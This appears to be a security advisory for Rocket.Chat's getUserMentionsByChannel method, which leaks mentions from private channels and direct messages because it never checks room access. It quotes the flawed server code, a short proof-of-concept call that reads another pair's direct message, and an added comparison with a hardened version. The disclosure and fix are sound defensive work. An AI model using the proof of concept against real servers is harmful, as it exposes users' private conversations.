The getUserMentionsByChannel meteor server method discloses messages from private channels and direct messages regardless of the user's access permission to the room.
When calling the getUserMentionsByChannel method, the server does not check the user's access to the given room and returns all messages in that room the user has been mentioned in.
Meteor.call(
  "getUserMentionsByChannel",
  { roomId: "<TARGET_ROOM>" },
  console.log
);
The issue was found in app/mentions/server/methods/getUserMentionsByChannel.js#L7-L23, where roomId is only verified to be a String; no check is made that the calling user may access the room.
Meteor.methods({
  getUserMentionsByChannel({ roomId, options }) {
    check(roomId, String); // type check only
    if (!Meteor.userId()) {
      throw new Meteor.Error('error-invalid-user', 'Invalid user', { method: 'getUserMentionsByChannel' });
    }
    const room = Rooms.findOneById(roomId);
    if (!room) {
      throw new Meteor.Error('error-invalid-room', 'Invalid room', { method: 'getUserMentionsByChannel' });
    }
    // The room is known to exist, but nothing verifies that the caller may read it.
    const user = Users.findOneById(Meteor.userId());
    return Messages.findVisibleByMentionAndRoomId(user.username, roomId, options).fetch();
  },
});
The server will return all messages in the room in which the requesting user has been @-mentioned.
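To show what the missing check looks like next to the vulnerable shape, here is an added example that is not part of the report or of Rocket.Chat's code base. It models the method against in-memory collections: the room types ('c' public, 'p' private, 'd' direct), the Subscriptions and Messages shapes, the canAccessRoom helper and the use of usernames as user ids are all assumptions made for this illustration, and the sample rooms and messages are constructed.

```javascript
// Added example, not Rocket.Chat's code: the mention lookup with and
// without a room-access check, over constructed in-memory data.

// Constructed rooms. Type codes: 'c' public channel, 'p' private group,
// 'd' direct message (assumed shapes, not the project's schema).
const Rooms = new Map([
  ['general',  { _id: 'general',  t: 'c' }],
  ['secret',   { _id: 'secret',   t: 'p' }],
  ['aliceBob', { _id: 'aliceBob', t: 'd', uids: ['alice', 'bob'] }],
]);

// Constructed memberships: who is subscribed to which room.
const Subscriptions = [
  { rid: 'general',  uid: 'alice' }, { rid: 'general',  uid: 'trudy' },
  { rid: 'secret',   uid: 'alice' }, { rid: 'secret',   uid: 'bob' },
  { rid: 'aliceBob', uid: 'alice' }, { rid: 'aliceBob', uid: 'bob' },
];

// Constructed messages; `mentions` lists the usernames mentioned.
const Messages = [
  { _id: 'm1', rid: 'general',  u: 'alice', msg: 'Hi @trudy',               mentions: ['trudy'] },
  { _id: 'm2', rid: 'secret',   u: 'bob',   msg: '@trudy is not here',      mentions: ['trudy'] },
  { _id: 'm3', rid: 'aliceBob', u: 'alice', msg: 'Mention @trudy somewhere', mentions: ['trudy'] },
  { _id: 'm4', rid: 'aliceBob', u: 'bob',   msg: 'ok @alice',               mentions: ['alice'] },
];

// Stand-in for Messages.findVisibleByMentionAndRoomId(...).fetch().
function findMentionsInRoom(username, roomId) {
  return Messages.filter((m) => m.rid === roomId && m.mentions.includes(username));
}

// Assumed authorization rule: public rooms are readable by any authenticated
// user; private groups and direct messages only by their members.
function canAccessRoom(room, userId) {
  if (room.t === 'c') return true;
  if (room.t === 'd') return room.uids.includes(userId);
  return Subscriptions.some((s) => s.rid === room._id && s.uid === userId);
}

// Minimal stand-in for Meteor.Error: `error` carries the machine-readable code.
class MethodError extends Error {
  constructor(code, reason) { super(reason); this.error = code; }
}

// Vulnerable shape: validates the argument type and that the room exists,
// then returns mentions without asking whether the caller may read the room.
function getUserMentionsByChannelVulnerable(userId, { roomId }) {
  if (typeof roomId !== 'string') throw new MethodError('error-invalid-params', 'Match failed');
  if (!userId) throw new MethodError('error-invalid-user', 'Invalid user');
  const room = Rooms.get(roomId);
  if (!room) throw new MethodError('error-invalid-room', 'Invalid room');
  return findMentionsInRoom(userId, roomId);
}

// Hardened shape: identical, plus an access check before any message query.
// Rejecting with the same code used elsewhere keeps behaviour consistent
// with how other message-reading methods refuse non-members.
function getUserMentionsByChannelHardened(userId, { roomId }) {
  if (typeof roomId !== 'string') throw new MethodError('error-invalid-params', 'Match failed');
  if (!userId) throw new MethodError('error-invalid-user', 'Invalid user');
  const room = Rooms.get(roomId);
  if (!room) throw new MethodError('error-invalid-room', 'Invalid room');
  if (!canAccessRoom(room, userId)) throw new MethodError('error-not-allowed', 'Not allowed');
  return findMentionsInRoom(userId, roomId);
}

// Returns the error code a call produced, or null when it succeeded.
function outcome(fn, userId, roomId) {
  try { fn(userId, { roomId }); return null; } catch (e) { return e.error; }
}

// Stand-alone demo: trudy asks for her mentions in the alice/bob DM.
console.log('vulnerable:', getUserMentionsByChannelVulnerable('trudy', { roomId: 'aliceBob' }).map((m) => m._id));
console.log('hardened:  ', outcome(getUserMentionsByChannelHardened, 'trudy', 'aliceBob'));
```

The point of the pairing is that existence and type checks are not authorization: the hardened version asks the same membership question the rest of the server asks before reading a room, and a non-member gets the same error-not-allowed refusal whether or not they were mentioned there.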
4.1.2
3.18.3
getUserMentionsByChannel with given { roomId: "<Value>" }
The following example leaks a direct message between two users, alice and bob, to a third account, trudy, who performs the requests from the authenticated client.
Meteor.user().username
// > 'trudy'
let alice = 'kYfzDMQLyPFjS9ASb';
let bob = 'zZnrfd2RvcWhspr6S';
Meteor.call(
  "getUserMentionsByChannel",
  { roomId: `${alice}${bob}` }, // direct message channel
  (err, data) => console.log(
    data
      .map((m) => `${m._id} ${m.u.username} (${m.ts.toGMTString()}): ${m.msg}`)
      .join("\n")
  )
);
// > Yp6NoMZk34mnQZiBR alice (Thu, 25 Nov 2021 14:17:25 UTC): Mention @trudy somewhere
// The same message cannot be read through the access-checked getMessages method:
Meteor.call("getMessages", ["Yp6NoMZk34mnQZiBR"], (err, data) => console.log(err.message));
// > Not allowed [error-not-allowed]
{ roomId } method argument. Authenticated users can disclose all messages they were mentioned in from private channels and direct messages they should not have access to.
We have fixed this issue in version 5.0.